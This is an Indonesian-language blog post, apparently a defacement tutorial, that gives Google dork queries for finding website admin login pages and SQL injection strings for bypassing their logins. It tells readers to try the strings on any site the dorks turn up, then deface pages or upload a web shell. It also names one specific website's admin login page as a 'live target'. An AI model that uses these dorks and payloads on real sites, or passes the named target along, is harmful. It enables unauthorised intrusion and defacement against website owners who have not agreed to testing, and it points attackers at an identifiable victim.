CARA DEFACE POC BYPASS ADMIN + Live Target !


Bahan - bahan :
1. Dork (Ada di bawah)
2. Shell / Uploader 
3. Kopi GoodDay + Rokok :vosss 
4. SABAR :3 


Dork :

    inurl:/login.php intext:login intext:adminsitrator


    inurl:/admin/index.php intext:username


    inurl:/admin/Admin.php intext:login 


    inurl:/administrator/login.php intext:username site:.


    inurl:/login.php intext:administrator intext:login





1. Dorking ke Google. 
Misal gua pake dork:
    inurl:/administrator/login.php intext:admin login


2. Pilih salah satu website.

3. Isi username + pass dengan

'=''or' atau 
' or 1=1 limit 1 -- -+ 


4.  Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.
     Jika login gagal, cari web yang lain. ( Ini gunanya SABAR :v )
 

5. Dan jika berhasil login, terserah kalian mau diapain :3 .
    Bisa add/edit News atau mungkin kalo lagi beruntung bisa upload shell :3


NB:NGGAK SEMUA WEBSITE BISA DI BYPASS

Live Target :

https://www.ranishfinance.com/admin/login.php
Okee sekian.

Komentar

Posting Komentar